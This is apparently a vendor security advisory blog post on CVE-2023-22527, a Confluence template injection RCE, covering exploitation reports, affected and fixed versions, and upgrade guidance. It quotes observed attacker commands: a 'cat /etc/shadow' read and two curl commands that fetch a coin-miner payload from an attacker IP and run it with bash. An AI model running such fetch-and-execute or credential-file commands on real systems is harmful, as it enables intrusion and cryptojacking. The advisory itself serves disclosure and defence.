CVE-2023-22527: Atlassian Confluence Data Center and Server Template Injection Exploited in the Wild
In the wild exploitation has begun for a recently disclosed, critical severity flaw in Atlassian Confluence Data Center and Server
Background
On January 16, Atlassian published an advisory for a critical flaw in its Confluence Data Center and Confluence Server products that was assigned a maximum CVSSv3 score of 10:
| CVE | Description | CVSSv3 |
|---|---|---|
| CVE-2023-22527 | Atlassian Confluence Data Center and Server Template Injection Vulnerability | 10.0 |
At the time of original publication, no in-the-wild exploitation has occurred. However, as of January 22, exploitation attempts have been observed.
Analysis
CVE-2023-22527 is a template injection vulnerability in Atlassian Confluence Data Center and Server. This vulnerability only affects out-of-date versions of these products. An unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to a vulnerable Confluence Data Center or Server instance. Successful exploitation would allow an attacker to obtain remote code execution.
In the wild exploitation reported by multiple sources
On January 22, several sources confirmed observations of in the wild exploitation attempts using CVE-2023-22527 including GreyNoise, ShadowServer, SANS Internet Storm Center (ISC), and The DFIR Report [1, 2].
We are detecting activity for CVE-2023-22527, which relates to a critical Atlassian Confluence Template Injection RCE vulnerability. So far, commands are focused on `id` `whoami` and `cat /etc/shadow` - Patch before it's too late!https://t.co/emEWll0PFk
— GreyNoise (@GreyNoiseIO) January 22, 2024
The DFIR Report specifically called out attempts to deploy cryptocurrency miners (or coin miners) using this vulnerability:
The coin miner attempts are starting to roll in:
Commands:
➡️curl -s http://23[.]94[.]214[.]119:8010/xs.jpg | bash
➡️curl -s http://23[.]94[.]214[.]119:8010/xs.jpg -o /tmp/.x;chmod x /tmp/.x;sh /tmp/.x
Source IP:
149.102.70[.]165
Sandbox run: https://t.co/CxKHSGBdXd pic.twitter.com/9F16cOsq50— The DFIR Report (@TheDFIRReport) January 22, 2024
Third vulnerability exploited in Confluence Data Center and Server in four months
Since October 2023, there have been three vulnerabilities in Confluence Data Center and Server that have been exploited in the wild, including one zero-day flaw.
| Date Disclosed | CVE | Tenable Blog Post |
|---|---|---|
| October 4, 2023 | CVE-2023-22515 | CVE-2023-22515: Zero-Day Vulnerability in Atlassian Confluence Data Center and Server Exploited in the Wild |
| October 31, 2023 | CVE-2023-22518 | CVE-2023-22518: Critical Atlassian Confluence Data Center and Server Improper Authorization Vulnerability |
Historically, Atlassian Confluence Data Center and Server has been a popular target by attackers because it is a public facing asset that is widely used. As recently as late December 2023, our partners at GreyNoise observed a spike in exploitation attempts against Atlassian products using a mix of broad scanning, hardcoded passwords as well as several CVEs including CVE-2023-22515 and CVE-2023-22518.
In addition to the uptick in exploitation attempts, on January 22, researchers at ProjectDiscover released a technical writeup on the vulnerability along with a nuclei template. With publicly available details, we expect exploitation attempts for CVE-2023-22527 to continue to increase in the coming days and weeks.
Proof of concept
Tenable’s Security Response Team has identified several proof-of-concept (PoC) exploits for CVE-2023-22527 posted to GitHub along with several posts containing the PoC on X.
Solution
The following versions of Atlassian Confluence Data Center and Server are affected by CVE-2023-22527:
| Affected Versions |
|---|
| 8.5.0 through 8.5.3 |
| 8.4.x |
| 8.3.x |
| 8.2.x |
| 8.1.x |
| 8.0.x |
Atlassian lists several fixed versions, though they stress that some of the fixed versions are “no longer the most up-to-date and do not protect your instance from other non-critical vulnerabilities.” Therefore, Atlassian advises upgrading to the latest versions instead.
| Affected Product | Fixed Version | Affected by Non-Critical Vulnerabilities? |
|---|---|---|
| Atlassian Confluence Data Center and Server | 8.5.4 (LTS) | Yes |
| 8.5.5* (LTS) | No | |
| Atlassian Confluence Data Center Only | 8.6.0 | Yes |
| 8.7.1 | Yes | |
| 8.7.2* | No |
*Denotes the “Latest Version” as of January 22, 2024.
Because in-the-wild exploitation has been observed, we strongly advise customers to upgrade to the latest version of Confluence Data Center and Server as soon as possible.
Identifying affected systems
A list of Tenable plugins for this vulnerability can be found on the individual CVE page for CVE-2023-22527. This link will display all available plugins for this vulnerability, including upcoming plugins in our Plugins Pipeline.
Get more information
- Atlassian Advisory for CVE-2023-22527 - RCE Vulnerability in Confluence Data Center and Confluence Server
- Atlassian FAQ for CVE-2023-22527
- Tenable Blog: CVE-2023-22515: Zero-Day Vulnerability in Atlassian Confluence Data Center and Server Exploited in the Wild
- Tenable Blog: CVE-2023-22518: Critical Atlassian Confluence Data Center and Server Improper Authorization Vulnerability
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
Related Articles
Cybersecurity Snapshot: Latest MITRE ATT&CK Update Offers Security Insights on GenAI, Identity, Cloud and CI/CD
April 26, 2024Check out what’s new in Version 15 of the MITRE ATT&CK knowledge base of adversary tactics, techniques and procedures. Plus, learn the latest details about the Change Healthcare breach, including the massive scope of the data exfiltration. In addition, why AI cyberthreats aren’t impacting CISOs’ budgets. And much more!
CVE-2024-20353, CVE-2024-20359: Frequently Asked Questions About ArcaneDoor
April 25, 2024Frequently asked questions about CVE-2024-20353 and CVE-2024-20359, two vulnerabilities associated with “ArcaneDoor,” the espionage-related campaign targeting Cisco Adaptive Security Appliances.
CVE-2024-4040: CrushFTP Virtual File System (VFS) Sandbox Escape Vulnerability Exploited
April 23, 2024A zero-day vulnerability in CrushFTP was exploited in the wild against multiple U.S. entities prior to fixed versions becoming available as the vendor recommends customers upgrade as soon as possible.
Cybersecurity Snapshot: Latest MITRE ATT&CK Update Offers Security Insights on GenAI, Identity, Cloud and CI/CD
April 26, 2024Check out what’s new in Version 15 of the MITRE ATT&CK knowledge base of adversary tactics, techniques and procedures. Plus, learn the latest details about the Change Healthcare breach, including the massive scope of the data exfiltration. In addition, why AI cyberthreats aren’t impacting CISOs’ budgets. And much more!
CVE-2024-20353, CVE-2024-20359: Frequently Asked Questions About ArcaneDoor
April 25, 2024Frequently asked questions about CVE-2024-20353 and CVE-2024-20359, two vulnerabilities associated with “ArcaneDoor,” the espionage-related campaign targeting Cisco Adaptive Security Appliances.
CVE-2024-4040: CrushFTP Virtual File System (VFS) Sandbox Escape Vulnerability Exploited
April 23, 2024A zero-day vulnerability in CrushFTP was exploited in the wild against multiple U.S. entities prior to fixed versions becoming available as the vendor recommends customers upgrade as soon as possible.
- Exposure Management
- Vulnerability Management
- Exposure Management
- Vulnerability Management